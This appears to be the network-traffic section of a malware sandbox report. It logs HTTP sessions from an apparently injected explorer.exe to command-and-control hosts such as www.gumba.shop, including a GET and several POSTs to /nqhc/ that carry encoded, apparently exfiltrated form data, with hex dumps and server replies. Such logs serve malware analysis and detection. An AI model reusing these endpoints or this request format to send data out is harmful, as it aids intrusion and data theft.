                                                                                                                                                                          2192.168.11.2049835198.58.118.16780C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:14:45.406071901 CET11078OUTGET /nqhc/?7nWHV=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.labour-office.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:14:45.542540073 CET11078INHTTP/1.1 404 Not Found
                                                                                                                                                                          server: openresty/1.13.6.1
                                                                                                                                                                          date: Mon, 05 Dec 2022 14:14:45 GMT
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          content-length: 175
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          20192.168.11.204985875.2.81.21280C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:01.903176069 CET11390OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.gumba.shop
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.gumba.shop
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.gumba.shop/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 53 36 74 62 63 6f 6e 6b 39 56 64 2d 62 35 45 6f 6a 53 30 4d 33 56 43 42 41 76 69 6c 47 74 6b 37 72 4f 5a 4c 52 43 33 30 59 79 51 6a 59 68 66 75 61 5a 36 4c 4f 58 35 46 53 44 69 41 64 59 38 5f 38 65 65 73 4f 4f 44 2d 6e 35 41 34 6b 6b 51 35 74 6c 55 36 37 79 43 30 42 2d 41 42 39 56 56 78 65 31 53 73 38 77 72 65 39 4d 7e 5f 4a 35 6e 4a 73 36 33 4d 34 4d 4d 41 73 36 54 6a 52 5f 58 6a 49 76 33 6a 7a 48 69 69 7e 47 6a 64 4c 7a 51 71 44 63 73 5f 42 6d 55 50 6f 77 4a 2d 4a 2d 75 43 38 47 4e 36 79 62 34 65 54 46 39 56 49 6e 4b 2d 68 47 57 4b 77 7a 54 5f 31 70 67 6c 38 72 79 62 28 36 35 5f 41 73 54 6b 6e 73 69 32 76 32 6d 72 57 5f 73 37 79 57 6f 67 70 56 69 5a 67 65 34 33 30 37 41 31 68 72 73 79 31 51 78 71 55 41 73 4c 39 6b 65 2d 28 6d 7a 61 46 70 72 33 6a 30 50 74 64 79 56 4a 6c 62 67 34 7e 4f 55 7a 57 61 4b 43 38 46 70 53 58 48 55 4b 41 42 32 59 4c 65 6c 41 57 6c 69 44 6c 46 6c 6a 6b 36 76 31 39 72 76 74 64 51 66 6e 4d 65 4f 69 49 4e 57 6a 4d 5f 38 6c 74 63 47 50 4f 4c 48 7a 50 75 30 72 47 66 30 30 61 47 61 6a 7a 46 62 4d 6f 75 72 34 4e 6a 45 35 41 45 55 68 37 68 28 33 74 62 6b 39 6f 49 7a 78 6d 75 79 6f 49 30 34 34 54 2d 77 71 6d 4e 49 61 45 54 53 33 4d 76 71 4c 51 7a 74 51 37 67 61 57 6d 63 4b 4c 6c 74 39 45 63 39 7a 7a 4f 43 4e 79 4d 4c 56 39 4b 47 33 32 31 4b 74 48 75 74 72 38 5a 5a 6d 34 38 42 35 53 75 71 47 65 79 69 4e 30 49 6c 6a 58 68 79 6a 73 34 69 57 64 44 57 36 47 74 41 4a 64 53 39 6b 68 44 46 72 7a 62 44 53 57 38 31 39 49 6a 74 6b 66 48 65 75 6e 62 51 72 71 4b 37 4f 32 52 2d 53 41 53 48 4f 5a 64 41 7e 48 50 4a 79 5f 70 34 63 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=S6tbconk9Vd-b5EojS0M3VCBAvilGtk7rOZLRC30YyQjYhfuaZ6LOX5FSDiAdY8_8eesOOD-n5A4kkQ5tlU67yC0B-AB9VVxe1Ss8wre9M~_J5nJs63M4MMAs6TjR_XjIv3jzHii~GjdLzQqDcs_BmUPowJ-J-uC8GN6yb4eTF9VInK-hGWKwzT_1pgl8ryb(65_AsTknsi2v2mrW_s7yWogpViZge4307A1hrsy1QxqUAsL9ke-(mzaFpr3j0PtdyVJlbg4~OUzWaKC8FpSXHUKAB2YLelAWliDlFljk6v19rvtdQfnMeOiINWjM_8ltcGPOLHzPu0rGf00aGajzFbMour4NjE5AEUh7h(3tbk9oIzxmuyoI044T-wqmNIaETS3MvqLQztQ7gaWmcKLlt9Ec9zzOCNyMLV9KG321KtHutr8ZZm48B5SuqGeyiN0IljXhyjs4iWdDW6GtAJdS9khDFrzbDSW819IjtkfHeunbQrqK7O2R-SASHOZdA~HPJy_p4c.
                                                                                                                                                                          Dec 5, 2022 15:16:01.953124046 CET11390INHTTP/1.1 403 Forbidden
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:01 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a
                                                                                                                                                                          Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx
                                                                                                                                                                          Dec 5, 2022 15:16:01.953182936 CET11390INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          21192.168.11.204985975.2.81.21280C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:03.934403896 CET11397OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.gumba.shop
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.gumba.shop
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.gumba.shop/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 53 36 74 62 63 6f 6e 6b 39 56 64 2d 62 35 45 6f 6a 53 30 4d 33 56 43 42 41 76 69 6c 47 74 6b 37 72 4f 5a 4c 52 43 33 30 59 79 59 6a 5a 55 4c 75 62 36 69 4c 66 6e 35 46 4d 54 69 46 64 59 38 59 38 65 33 6b 4f 4f 50 78 6e 5f 4d 34 6b 7a 30 35 74 58 4d 36 7e 79 43 33 66 4f 41 44 32 31 55 74 65 31 4f 34 38 30 48 4f 39 38 61 5f 62 72 76 4a 7e 5a 50 50 67 4d 4d 43 73 36 54 76 56 5f 58 72 49 76 37 4e 7a 48 75 69 7e 45 58 64 4b 43 73 71 42 72 59 5f 5a 47 55 4d 69 51 4a 37 65 75 76 36 38 47 59 4a 79 62 34 4f 54 45 35 56 49 67 65 2d 67 48 57 4c 7e 7a 54 5f 32 70 67 6d 34 72 75 66 28 36 6b 71 41 73 33 6b 6e 72 6d 32 7e 6d 6d 72 48 71 41 38 6b 6d 6f 6d 7e 6c 6a 66 6b 65 38 5f 30 37 46 47 68 70 41 79 32 67 4e 71 56 7a 30 4c 75 56 65 2d 6a 57 7a 59 4a 35 72 6f 32 45 4f 70 64 78 39 7a 6c 62 42 4e 7e 4e 59 7a 58 37 47 43 35 6e 4e 54 52 6e 55 4d 4d 68 32 4a 41 2d 34 50 57 68 47 66 6c 46 6c 7a 6b 34 44 31 36 62 66 74 63 53 6e 6b 50 4f 4f 6c 45 74 58 37 48 66 77 6a 74 63 71 48 4f 4b 50 6a 50 74 59 72 55 76 30 30 52 41 54 31 39 31 62 50 71 75 72 51 41 44 46 5f 41 45 51 4c 37 6c 6e 6e 74 4c 59 39 70 35 44 78 33 75 79 6e 4f 55 34 38 5a 65 77 6f 69 4e 49 61 45 54 66 47 4d 76 6d 4c 51 43 46 51 35 54 79 57 32 61 43 4c 6e 74 39 34 63 39 7a 59 4f 43 52 5f 4d 4c 64 66 4b 47 47 62 31 50 64 48 33 5a 50 38 59 62 4f 37 33 68 35 74 6b 4b 47 33 32 6a 77 79 49 6c 28 6c 68 79 7a 57 34 52 53 64 43 57 71 47 28 77 4a 65 58 64 6b 71 55 31 72 6c 4d 54 65 30 38 78 6b 39 6a 73 67 70 48 65 47 6e 66 47 43 75 50 5f 4b 41 49 4e 44 70 53 42 53 71 64 57 32 32 4b 4e 4f 59 71 65 71 2d 4d 4b 78 44 31 34 42 65 58 43 4d 37 6a 45 49 41 65 59 51 4f 41 7a 41 53 59 49 68 32 44 72 58 4e 64 56 32 73 49 6c 61 75 6b 73 35 37 5a 78 33 63 53 42 4f 5a 41 62 4c 6b 6d 4d 4a 53 39 5f 34 30 78 4a 54 72 75 79 6d 64 71 78 32 48 4f 43 41 55 55 39 39 7a 57 53 31 2d 6d 49 70 52 39 61 58 5a 44 63 59 4e 6a 72 4b 4d 38 58 6a 68 73 55 6c 67 46 71 30 6b 7a 53 4f 46 47 56 4a 5f 68 6a 59 79 44 53 6f 4d 52 68 36 77 64 53 54 4e 59 47 41 65 79 63 6d 56 56 70 45 5f 6f 36 6b 46 6d 6f 38 43 76 5f 38 30 35 5a 33 33 70 39 6d 68 67 67 49 64 42 6c 41 56 65 62 6e 44 42 77 70 6f 41 46 67 56 58 2d 75 74 33 42 57 4a 5a 2d 6f 6e 6a 64 50 35 38 6e 55 52 79 73 54 53 66 4f 4b 56 36 4a 77 68 67 64 63 70 65 49 46 6b 61 37 34 6a 36 2d 57 5a 64 6f 70 71 28 41 43 4f 53 57 5a 6e 6e 51 51 6e 50 66 46 50 6b 4d 28 51 63 4d 4a 64 57 2d 76 56 74 72 68 31 54 61 6c 51 44 38 72 79 49 32 36 37 33 45 54 6f 28 77 64 59 74 69 46 48 41 79 58 4e 31 6d 71 56 78 6c 69 46 74 71 51 55 4f 31 74 54 78 2d 35 4e 35 73 55 6b 42 4f 62 4e 4f 67 46 33 7e 61 57 61 50 6e 65 58 58 6a 72 6d 70 4c 65 68 4f 49 37 4b 71 58 46 44 39 74 71 6e 74 56 28 74 56 77 56 31 6e 72 28 5a 7e 6e 39 33 73 73 37 45 37 35 6f 56 4b 56 79 59 71 38 30 52 53 52 66 63 67 73 66 44 33 4d 31 44 78 44 34 4a 70 6b 38 37 46 48 52 2d 53 4e 76 2d 37 34 32 41 48 47 4c 62 45 44 34 74 46 4a 4f 47 4a 5a 38 68 48 31 4d 4b 58 52 76 69 30 52 57 31 46 48 54 4e 71 41 53 4d 28 70 58 67 51 36 43 52 45 75 4a 6b 79 38 74 61 30 6f 70 72 71 61 46 5f 5a 44 41 62 7a 59 30 6d 5a 74 77 5f 39 5a 5a 45 4d 51 52 68 51 71 6a 53 37 50 67 64 38 65 58 56 4b 77 78 68 6e 4d 79 4d 4b 75 45 62 4f 78 59 74 33 75 6e 44 72 53 58 6d 55 74 66 41 78 63 4a 32 65 54 68 32 32 6d 53 6f 4c 63 43 39 31 65 57 47 59 63 74 37 72 64 35 61 6d 63 53 6b 65 39 41 74 56 65 31 39 66 44 6d 33 31 34 4d 43 4b 66 6d 5f 48 54 67 65 52 6b 47 52 4f 43 67 6b 59 57 63 4e 56 68 50 72 48 45 73 48 39 49 69 33 79 62 57 47 56 74 4c 4e 54 57 41 68 45 39 70 68 47 67 5a 77 64 6e 77 62 6d 4d 71 6a 41 77 4e 75 35 78 7a 4e 38 2d 28 48 33 62 70 67 51 74 62 37 49 77 65 73 70 4f 4e 31 7e 48 79 56 38 34 68 65 7e 38 31 50 28 61 67 4e 31 38 78 37 4c 6e 65 48 59 2d 4d 36 71 59 7a 77 44 67 51 6f 78 79 39 2d 67 31 42 2d 63 6f 49 68 70 79 34 54 59 42 73 56 66 6e 63 42 77 74 72 77 53 43 6c 6d 72 68 39 64 42 54 31 79 68 74 45 46 47 71 4c 74 61 79 78 35 75 39 54 43 4a 67 4c 79 37 55 31 70 34 58 59 4c 31 6d 31 6f 6c 44 6c 68 36 78 36 2d 56 4f 4a 4d 53 53 5a 51 4f 35 76 72 28 53 43 47 55 68 30 4e 65 6a 47 45 68 31 59 68 72 30 35 78 34 44 59 4e 57
                                                                                                                                                                          Data Ascii: 7nWHV=S6tbconk9Vd-b5EojS0M3VCBAvilGtk7rOZLRC30YyYjZULub6iLfn5FMTiFdY8Y8e3kOOPxn_M4kz05tXM6~yC3fOAD21Ute1O480HO98a_brvJ~ZPPgMMCs6TvV_XrIv7NzHui~EXdKCsqBrY_ZGUMiQJ7euv68GYJyb4OTE5VIge-gHWL~zT_2pgm4ruf(6kqAs3knrm2~mmrHqA8kmom~ljfke8_07FGhpAy2gNqVz0LuVe-jWzYJ5ro2EOpdx9zlbBN~NYzX7GC5nNTRnUMMh2JA-4PWhGflFlzk4D16bftcSnkPOOlEtX7HfwjtcqHOKPjPtYrUv00RAT191bPqurQADF_AEQL7lnntLY9p5Dx3uynOU48ZewoiNIaETfGMvmLQCFQ5TyW2aCLnt94c9zYOCR_MLdfKGGb1PdH3ZP8YbO73h5tkKG32jwyIl(lhyzW4RSdCWqG(wJeXdkqU1rlMTe08xk9jsgpHeGnfGCuP_KAINDpSBSqdW22KNOYqeq-MKxD14BeXCM7jEIAeYQOAzASYIh2DrXNdV2sIlauks57Zx3cSBOZAbLkmMJS9_40xJTruymdqx2HOCAUU99zWS1-mIpR9aXZDcYNjrKM8XjhsUlgFq0kzSOFGVJ_hjYyDSoMRh6wdSTNYGAeycmVVpE_o6kFmo8Cv_805Z33p9mhggIdBlAVebnDBwpoAFgVX-ut3BWJZ-onjdP58nURysTSfOKV6JwhgdcpeIFka74j6-WZdopq(ACOSWZnnQQnPfFPkM(QcMJdW-vVtrh1TalQD8ryI2673ETo(wdYtiFHAyXN1mqVxliFtqQUO1tTx-5N5sUkBObNOgF3~aWaPneXXjrmpLehOI7KqXFD9tqntV(tVwV1nr(Z~n93ss7E75oVKVyYq80RSRfcgsfD3M1DxD4Jpk87FHR-SNv-742AHGLbED4tFJOGJZ8hH1MKXRvi0RW1FHTNqASM(pXgQ6CREuJky8ta0oprqaF_ZDAbzY0mZtw_9ZZEMQRhQqjS7Pgd8eXVKwxhnMyMKuEbOxYt3unDrSXmUtfAxcJ2eTh22mSoLcC91eWGYct7rd5amcSke9AtVe19fDm314MCKfm_HTgeRkGROCgkYWcNVhPrHEsH9Ii3ybWGVtLNTWAhE9phGgZwdnwbmMqjAwNu5xzN8-(H3bpgQtb7IwespON1~HyV84he~81P(agN18x7LneHY-M6qYzwDgQoxy9-g1B-coIhpy4TYBsVfncBwtrwSClmrh9dBT1yhtEFGqLtayx5u9TCJgLy7U1p4XYL1m1olDlh6x6-VOJMSSZQO5vr(SCGUh0NejGEh1Yhr05x4DYNWCqmmFUKNtY1tVr4HA9O(nutFLhEgNcCi-pwyqQvVct1xvpcYw~ie8N-CqlYRpAdhsax24h20kmX81Ml68bRXnVjbCa8K4kK7s7Ff0TyTp3hQwiG3kcMYFaLcl(u4R(tgG9AEqJ9pz4ed1xGG2bRvhOK7qJWnwAqJsSQmuwmnl9TvczbkeOnFAPmwPa9otIWDQGT7Xr0nv27m9aTy0fHkh9jvwtmFn4L5mhz1X4BqJ3lbpKWGOJW9YF_~oiB~ZmYy22HuBlzPAVaAGBrRsXlPth9JdGfYNO6LPmlGCvd3NHbD5gVy1dvKT0SYe4bvYebQBz07OVRF3f9rPHzDxBUOvpK6evoeiSXB2OR00wZlrR1UkZmrIr31grp~t(cavGJkSoREUixFZMndUKWeHOS9QzlACUc40rZG5Wwi_mVi939yAykCXvuQNoGn_PxsKU27_5IA6aEu0n9dfBhKoEYM0Y9EdMCoof74scIJwMxLIm3eZO2G8i8I0v1KJySb2IydbH2uR94JdcK75nToPgzfYH7yjDxOo83UeiP~l8I5jln59jvSLkuvyRxKKzEo9jGjtExRuXKGtD01mx_3ld190Q5d41-u9SEhUuxWXfng6SmQVGw9WjSBj0_2AHOG5XbgNX7V506FfQxrZZlkMYqjzzseDfIS-WLmRFRudhEKL~2PtP2Z4egUapnjyZJWgREZtpaTzWlSPaJn65BCmt6~fpI(PJVLYQk8bk_jKBk5R9lu10ss5ZHRWfOpxFMiLdaxrbOU0QU3WZ_ufTbe2jVgubXtvvVbwn2UDAHjcL75Bwyf2nNqfmgK3wd~nhv127yNZF7i0e2et63AUfWpeXzh-QN~wlHWp(7ZlQnFBglPV7akZwDZbsj(PrNJhefVaK_dG(3l_nHN9NC2CQhTihBJRQOofgbhE19IpPoFJu_ERRR2FNyt_s3WBW6ho1A1vr9Q3Y0CEQnGWKJhUofNUzV83c97r1CxvcgrZjDk_gY4eSqWkrps2lwFmMKyzqGmU6wYudnj6kUwhWarCVTQnlUSCFJ24k_kBbHw8D8(vBwcDc57iTgF_5cAx8ttTRN9T~fPUSat15cXG2y5b8GYguZl9vrCoQuI-xjyadelBLNgj~TQNKL6isJcPW3~vS0WOzBhmRXCbN_pp63C_KhboHvysZdZuj-Shsw1cMQDOXwP7NRN6ye0rgXOwKp599kBs537t41hTNu1ZmMOzjeTefjwNJ490S2mN6l6i2u9c0BuNO_fodkpgs6QdAa73y7EPCalTTfAggt9GwcVH~g9vJprlDknlutHIzWG4pwJegSjit-CgRcmW~h7EJcnYQaKSCWafqjsIA0Zs(g9i5vo_4aCF6YpJGGuLsE9g7MD3VF0EsYBNa5LZdD(FCLivb5jdpUDawLI3tqDe2EE_O8mDcTTlkqT_AOANg0XQthHwdEXMZI5VIpL28SmPpM7VYHTY4Y5bKaoshhwYWXaH6a7lxKgMt54CuXJy(_kTYUCvL0PC8t7dF0JOGQUhtLMEpWV77T1MjUC8~i~CiIAdAyhjSOgOSrBMbwtB(FDrwoAm93BL7g8JzVVbuZ9GWU6wS3SrvfSmpk9PQ353yL2sv2A6xwI_vhDSHbhMza0wGI0FNrfmrPP4OrVNPT1-KhYeTgg_IlufiJa-HCQ8PXRiOaLYBhA3OeYQpsdzxmUOi5wvPs3ZLdMro1mulZuOA17u4bW89dcMczapLUbqWINUWj2NYB9-utRZOAOWtxB36Zf3DMiMIjFLmiu1bQMbQo0-a-jWtzg2tgbHiLH2rNYAtvm873CaPpI-AAzcus0MrNDqmYllSapxG28298(AUmrxw9qP6BaIEXP8bpC3wXGA7phJrLlTSMdZacMJLgR8qMU9Hzy_lHSeJNO87_S9nXZB3W87VVRzryrS5YDo0mJwkr(Lh-8p4VO6MIHQdt8IlzcQqCgKy-S0(ichG9sSs36l4eh6YtWkmUBvHjj-DfjVUFnc19hgAqKn3xGg2UrfTcxFvFLrsVck~wcihjPhglr0s4xh0nn3MZ29mxa6RHLAIWlFhrgbxWSYoAe0psNBwcksLxug9m5KN0msuUc7YMSTdDXMdyGzriUjwXJ3(Y2zkBTsmmJAQWv9r6l1ihE2EbmMk74sw8VIkvR9wiCW7FuZlp9DMpGj(URL0BP24alRKIzMv5tVpWFXOtGQV00tjPjgVXU0qLUT4XXUXOfxZtMY2rztLKcHFiaNtAWnt0~tqK0GnLTheV~i55KOolbZuJLqyrqG(qRylnJxMrLBedu2oeaF0cbc2VrxpCjww6NGSZNbMh8zBkGzUFiKRzvoFJR_8WXMwbwkc9JAV-Ppft0VdCOwEHkkztDqXpX8dLNJOBWgkVFIQNaTuwE_yoii91lWMzsC2yJwACm4C6EqnJKeNwcd4A1JVkaOer4ca5NkkgM_nJgC3OVL9SvfaFrlCL6fiagmGWQ_3CQmPa(vW1BGN3eMISQpJzoV8AIdw3vqBqXriXJlRKMBMNeVRbSx1H0nF2yUiNQwLR3NbYKXcFWtZMWUs3UZsOP0Kb2Q0rUOZmDOoXJh0wwr7GrB~uBtnJiGzwwbzw~y0L8WLE4NyZvOSLwyudXaBu1Xr-FK5NYNuUF5wQQuZ36gHaMmBo1mpGR65P3TGA5vJzJtUIZ3NgxLHq2xrHSeJ-rhUofzyunaZiU_1Mp7e_h0gl2gG0xaTT
                                                                                                                                                                          Dec 5, 2022 15:16:03.934498072 CET11403OUTData Raw: 34 38 62 6b 50 46 6b 71 4e 78 75 65 65 6c 58 75 46 39 7a 2d 37 34 58 52 44 39 48 43 72 30 50 72 78 46 74 5a 61 4b 65 63 7e 35 42 68 78 78 59 62 63 67 34 63 65 64 49 51 46 54 57 36 73 6e 67 66 4f 4a 31 4a 4a 73 51 56 52 77 63 4e 55 43 46 55 5a 72
                                                                                                                                                                          Data Ascii: 48bkPFkqNxueelXuF9z-74XRD9HCr0PrxFtZaKec~5BhxxYbcg4cedIQFTW6sngfOJ1JJsQVRwcNUCFUZr1wFbvAwtdW896jW_RRYSt_3iRlge8MgxZGvFuqTjtc6rmDxwXqyX2lOMM2yWJl2eNMMLS-UZ(n6VNnbh5d(RYKDBABG8Dzil9abOJ7lpgTwSE86D89SvzL3x2NkYFoYi4PU0d9CT1Px3(7Yl7Y3TaWsG2XNu8kWjp
                                                                                                                                                                          Dec 5, 2022 15:16:03.945650101 CET11406OUTData Raw: 59 64 79 4c 7e 38 48 77 66 47 79 63 6b 57 6a 35 7a 57 75 72 34 62 6e 6c 47 45 47 78 64 4f 35 43 78 6f 72 62 5a 63 34 4d 61 6a 50 54 6b 54 38 42 65 33 78 68 41 35 64 79 72 79 77 54 28 4c 5a 36 6e 59 48 34 36 61 59 49 70 45 7a 4a 6f 4b 6d 65 78 79
                                                                                                                                                                          Data Ascii: YdyL~8HwfGyckWj5zWur4bnlGEGxdO5CxorbZc4MajPTkT8Be3xhA5dyrywT(LZ6nYH46aYIpEzJoKmexy7NWUJKoCeAWaf8BpR4WsZ-iUxYtbufmwoq0WA2IuRyfjtgYrzJmIKZBTYlv0C7cLINUWWYPKOhcqLOMcSRJ2scrBrsoVIkbPNR93k3WuoZF4HAWFfvzy6XfB~b99uwByn_w-PZgbzxi03eOF2h1H3eYgC7z8Uk2Ek
                                                                                                                                                                          Dec 5, 2022 15:16:03.945995092 CET11414OUTData Raw: 6c 77 79 63 77 77 49 31 66 50 32 56 30 53 4d 56 45 52 28 45 72 34 64 55 70 79 45 4c 6b 49 6b 32 54 4a 63 55 48 69 4a 41 70 75 55 50 7a 76 76 77 4b 31 53 4d 6c 49 7e 4a 6c 46 52 78 48 31 35 59 4a 52 7e 41 48 64 56 33 74 6a 47 66 52 63 54 35 49 55
                                                                                                                                                                          Data Ascii: lwycwwI1fP2V0SMVER(Er4dUpyELkIk2TJcUHiJApuUPzvvwK1SMlI~JlFRxH15YJR~AHdV3tjGfRcT5IU39ORLa8L0Jwk~Nncrv5oQpChc7eeYbeyfOo8JGv_Cazo9ML4PQK5XJFGN3JY(sc16kx5AxF6C0JDSIctjba2gsrTRhqWo6ya7fot7NAISEg3~iJbcxiTPMATod9etoCqn1TNrRwfs85bPbo4vV77viVSx28MsNcNp
                                                                                                                                                                          Dec 5, 2022 15:16:03.946307898 CET11417OUTData Raw: 73 6b 64 5a 73 49 4e 65 4e 6f 35 49 6e 74 50 5a 68 6d 34 43 62 6a 56 45 5a 59 47 46 65 51 47 70 53 67 28 30 6b 4f 7a 41 63 71 7e 68 55 62 72 76 63 32 67 77 6b 71 58 67 73 34 47 37 6f 5f 72 76 45 55 4b 69 69 51 49 7a 55 32 75 63 57 32 39 70 39 79
                                                                                                                                                                          Data Ascii: skdZsINeNo5IntPZhm4CbjVEZYGFeQGpSg(0kOzAcq~hUbrvc2gwkqXgs4G7o_rvEUKiiQIzU2ucW29p9yD8GJRsgFzgaoINAj2ixuIGfOdJaL(ziTn2pIMEfdxaW6lL~FPY1yFTNGV6zgNbwhERe-1ZILi-DPnTDKLMW6oZYxVgC3xA0lE5fbOoeFu91nUaTLv3wF9emM49XFeaL6rL4xIdzt3ThxJA3dlFvHM-4pE_iw7MfIl
                                                                                                                                                                          Dec 5, 2022 15:16:03.946460962 CET11422OUTData Raw: 50 5f 54 6e 57 31 41 42 33 4f 6d 6d 39 77 71 70 38 33 70 50 59 2d 38 55 6a 44 6c 45 44 45 35 5f 72 70 77 47 69 35 57 56 38 78 7a 38 76 6c 46 35 56 41 61 58 6a 35 6b 4a 68 77 35 2d 44 68 79 4f 37 51 67 63 79 42 4e 53 34 6f 6e 51 43 68 49 59 45 54
                                                                                                                                                                          Data Ascii: P_TnW1AB3Omm9wqp83pPY-8UjDlEDE5_rpwGi5WV8xz8vlF5VAaXj5kJhw5-DhyO7QgcyBNS4onQChIYETRojsLgBKnPgqeYA3WA1IPJGKTxNhR-r1xxKJN-Znq87QrgQDp1cUf4E97NLr3qhTUF1OzfLudBDF6o0aS9tNhZ(92I08dLi25vV_RFlm90hePQLeaICNFbLZjiQLrdwoWmwemB5-IAhD4Bbfu8GWGpaTRK2nLrKwJ
                                                                                                                                                                          Dec 5, 2022 15:16:03.946630955 CET11428OUTData Raw: 43 30 6d 65 78 30 70 48 35 4b 36 6c 56 4b 39 6e 46 4d 39 67 41 4c 6d 32 7a 68 6e 37 53 6f 4b 71 34 6e 4c 76 65 51 6c 62 75 72 6e 71 62 5a 6a 51 7e 38 72 6a 4c 79 76 56 39 42 79 70 6f 5a 7e 62 7e 45 75 38 51 5f 30 63 71 48 45 79 66 63 64 43 47 63
                                                                                                                                                                          Data Ascii: C0mex0pH5K6lVK9nFM9gALm2zhn7SoKq4nLveQlburnqbZjQ~8rjLyvV9BypoZ~b~Eu8Q_0cqHEyfcdCGcKxEicJd4rQ1jwz43bGsZsPM2ubRUYN7240SMPrVpdd~Zv9mkb3vNKx79JHS36zx5Em9oewRvFjAGpVnT0j0-3_QVKZ9hdEt3~ofOE2Q6CQQsKv4OOiA2aPb68UUfmmt1L7LWeIjwzEFP8ZKKOkxwNuDdaNESDYnTV
                                                                                                                                                                          Dec 5, 2022 15:16:03.957211018 CET11431OUTData Raw: 34 76 74 6e 37 5f 62 77 32 79 6d 39 43 35 54 44 77 4a 37 64 35 78 75 4c 68 76 79 76 44 41 58 32 57 79 50 44 36 62 6c 79 56 30 70 38 6f 2d 6b 32 32 5f 59 79 53 67 6c 4f 54 4c 65 71 59 51 31 58 76 34 42 49 6d 48 56 64 5a 52 49 59 59 50 43 5f 70 77
                                                                                                                                                                          Data Ascii: 4vtn7_bw2ym9C5TDwJ7d5xuLhvyvDAX2WyPD6blyV0p8o-k22_YySglOTLeqYQ1Xv4BImHVdZRIYYPC_pwdHL9yZV3UYqpyD30zuQ6nHF4wo90il4l1efGuy9_j1GRzZBvx3s4KHyVkiK8bC27BGQ3omIVlzI00RZWNzUkdwGMAVGxsdVunvpbHELvBnnRa0HtBQxephGrstzGyQmpIfwwVZ7Ud-zM0lLB(nNObx5a0hJoisqqS
                                                                                                                                                                          Dec 5, 2022 15:16:03.957544088 CET11435OUTData Raw: 65 66 52 30 61 67 57 6a 52 4c 6c 57 53 65 66 32 51 72 28 6b 67 6c 48 6b 65 5a 42 79 6f 72 58 6a 36 48 4e 45 43 70 73 78 65 41 75 7a 49 43 69 49 34 4d 52 74 74 71 6a 42 78 6d 49 70 50 4c 68 45 77 73 54 30 76 50 64 68 31 43 6c 5a 38 32 6f 2d 33 6b
